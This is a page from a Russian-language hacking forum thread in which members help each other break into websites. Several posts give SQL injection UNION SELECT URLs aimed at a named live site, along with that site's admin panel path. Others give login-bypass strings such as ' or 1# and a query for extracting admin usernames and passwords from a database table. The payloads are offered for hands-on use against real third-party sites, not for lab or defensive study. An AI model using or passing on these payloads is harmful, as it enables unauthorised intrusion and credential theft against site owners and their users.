Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    помогите подобрать количество колонок..
     
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    http://www.hard-ekt.ru/index.php?section=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20--
     
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    F4R
    Может пора заканчивать с такими вопросами?
    В чём у тебя возникли сложности? Или тебе просто лень? Там всё элементарно, а это уже наверное 10 твой такой вопрос, неужели так трудно подбирать колонки?
    Прочитай одну любую статью по скулям
     
  4. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    дак я читал...
    просто непонятно вы что в ручную всё подбраете или тупо линк кинули в прогу и она сама подобрала?
     
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    А что там подбирать-то?
    order by
    group by
    в статьях это отлично расписано
     
  6. Ghost0ff

    Ghost0ff New Member

    Joined:
    18 Nov 2008
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0
    http://www.hard-ekt.ru/index.php?section=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* читай внимательнее!!!
     
  7. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    как то ты не в тему))
     
  8. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    а какие есть способы нахождения админки кроме тупого подбора?
    http://www.hard-ekt.ru/
    где например она находится здесь?
     
  9. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    иногда помогает файл robots.txt
    http://www.hard-ekt.ru/wedadmin/
     
  10. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Всегда как минимум смотри исходники страницы, увидел Joomla, Wordpress и тому подобное - делаешь выводы, где админка. Или слушаешь совет выше, или пишешь свой брутер на диры (не так сложно, кстати)

    ЗЫЖ за исключением наличия полей ввода логина-пароля прямо на главной странице, конечно:)
     
  11. ronald

    ronald Elder - Старейшина

    Joined:
    27 Mar 2008
    Messages:
    252
    Likes Received:
    42
    Reputations:
    6
    А как реализовывается обход авторизации к примеру в данном случае
    SELECT * FROM adminpanel WHERE pass = ' ' ?
     
    #4511 ronald, 10 Jan 2009
    Last edited: 10 Jan 2009
  12. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    если уязвимо поле pass то в это поле пишем
    Code:
    12345' OR login='admin'; --
    запрос станет таким
    Code:
    SELECT * FROM adminpanel WHERE (login='admin' AND pass='12345') OR (login='admin');
    авторизация будет успешна пройдена под логином admin
     
  13. ronald

    ronald Elder - Старейшина

    Joined:
    27 Mar 2008
    Messages:
    252
    Likes Received:
    42
    Reputations:
    6
    там ограничение на длину=7
     
  14. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    линк в студию =)
     
  15. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    ' or 1/*
    Тут 8, если ограничение только в форме, перехватывай пакет
     
  16. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    что это?)
     
  17. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    ' or 1#
    7 ;)
     
  18. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    Всем привет.

    Подскажите, нипАнятна.

    пытаюсь вывести данные из колонки admin:
    =-345+union+select+1,2,concat_ws(0x3a,admin_user,admin_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+admin--

    Ничего не выводит. Пробую лимит, тоже самое. Хэксил - пусто.

    Пишу:

    =-345+union+select+1,2,count(*),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+admin--

    Выводит число 149

    Чиво делаю не правильно?
     
  19. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Попробуй без concat'а.

    Code:
    -345+union+select+1,2,admin_password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19+from+admin--
     
  20. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    R1dex, уже пробовал, не катит. хммммм...
     
Thread Status:
Not open for further replies.